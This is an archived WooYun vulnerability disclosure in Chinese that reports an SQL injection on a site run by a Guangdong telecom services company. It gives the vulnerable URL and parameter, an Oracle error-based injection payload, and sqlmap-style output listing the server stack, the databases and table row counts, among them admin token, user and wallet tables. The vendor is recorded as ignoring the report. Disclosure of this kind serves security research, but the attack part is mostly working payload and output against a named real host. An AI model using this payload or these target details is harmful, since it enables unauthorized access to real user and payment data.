广信通信某站sql注入

admin 2017年4月25日08:22:59评论430 views字数 212阅读0分42秒阅读模式
摘要

2016-03-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-18: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(0) 关注此漏洞

缺陷编号: WooYun-2016-180891

漏洞标题: 广信通信某站sql注入

相关厂商: 广东广信通信服务有限公司

漏洞作者: 保护伞

提交时间: 2016-03-04 17:38

公开时间: 2016-04-18 17:38

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 注射技巧

0人收藏


漏洞详情

披露状态:

2016-03-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-04-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

点办(163.cn)是中国规模最大、业务范围最全的信息与媒体运营商的服务商——中国通信服务股份有限公司(股票代码HK00552),旗下广东广信通信服务有限公司强力打造的汽车增值服务平台
广东广信通信服务有限公司是中国通信服务股份有限公司(股票代码:HK 00552)旗下的独立法人公司,注册资金为3.2亿元人民币。

详细说明:

code 区域
注入:http://jm.163.cn/frontend/Account/system_message_a.aspx?id=492 (GET)

Parameter: id (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: id=492 AND 1587=CTXSYS.DRITHSX.SN(1587,(CHR(113)||CHR(106)||CHR(113)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (1587=1587) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(122)||CHR(113)||CHR(113)))
Vector: AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Oracle
available databases [13]:
[*] APEX_030200
[*] BUILDINGBLOCK
[*] CTXSYS
[*] DIANBAN
[*] EXFSYS
[*] GXCC
[*] IVSP
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] TSS
[*] XDB


Database: BUILDINGBLOCK
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| TB_BLOCK_CRONLOG | 2129954 |
| TB_BLOCK_APILOG | 94624 |
| TB_BLOCK_LOG | 19549 |
| TB_WXADMIN_LOG | 13099 |
| TB_TRANS_LOG | 5193 |
| TB_JM_PRIZE_HIS | 4686 |
| TB_EWX_FINDPEOPLE | 3782 |
| TB_EWX_FINDPEOPLE_RANKING | 3780 |
| TB_BLOCK_DIC_CITY | 2919 |
| TB_WSP_SUBSCRIBE | 2814 |
| TB_BLOCK_DIC | 603 |
| TB_JM_PRIZE_LOG | 580 |
| TEMP_PRIZE | 580 |
| TB_WXSTAT_USERSUMMARY | 562 |
| TB_BLOCK_ADMIN_TOKEN | 496 |
| TB_BLOCK_AUTHENCODELOG | 470 |
| TB_BLOCK_PAYAPILOG | 433 |
| TB_WXSTAT_USERCUMULATE | 404 |
| TB_EWX_20150720_USER | 294 |
| TB_BLOCK_PAYLOG | 228 |
| TB_BLOCK_ADDRESSBOOK | 195 |
| TB_REDEEM_ORDER | 174 |
| TB_REDEEM_ITEM | 140 |
| TB_BLOCK_SEARCHLOG | 122 |
| TB_BLOCK_USER | 98 |
| TB_PHONEAPP_ITEM_20160302 | 98 |
| TB_TRADEIN_ORDER | 92 |
| TB_PHONEAPP_ITEM | 84 |
| LPTEMP20151217 | 81 |
| TB_BLOCK_WALLET_ENTRY | 80 |
| TB_BLOCK_MESSAGE | 77 |
| TB_PHONETRADE_ORDER | 46 |
| TB_PHONETRADE_ITEM | 41 |
| TB_TRADEIN_ITEM | 35 |
| TB_EWX_20150720_VOUCHER | 22 |
| TB_REDEEM_BOOKMARK | 20 |
| TB_BLOCK_EXPRESSCACHE | 18 |
| TB_BLOCK_ITEM_COUNTLOG | 17 |
| TB_PHONETRADE_IMEI | 17 |
| TB_PHONETRADE_COMPLAIN | 14 |
| TB_EWX_FINDPEOPLE1 | 11 |
| TB_PHONEAPP_TYPE | 9 |
| TB_BLOCK_ADMIN | 8 |
| TB_BLOCK_TC | 8 |
| TB_PHONETRADE_BOOKMARK | 7 |
| TB_WXADMIN_CONFIG | 7 |
| TB_BLOCK_ADMIN_GROUP | 5 |
| TB_JM_PRIZE | 4 |
| TB_TRADEIN_COMPLAIN | 4 |
| TB_BLOCK_BANNER | 3 |
| TB_JM_TOUR | 3 |
| TB_JM_PRIZE_TIME | 1 |
| TB_TRADEIN_MERCHANT | 1 |
+---------------------------+---------+

漏洞证明:

广信通信某站sql注入

广信通信某站sql注入

修复方案:

rt

版权声明:转载请注明来源 保护伞@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin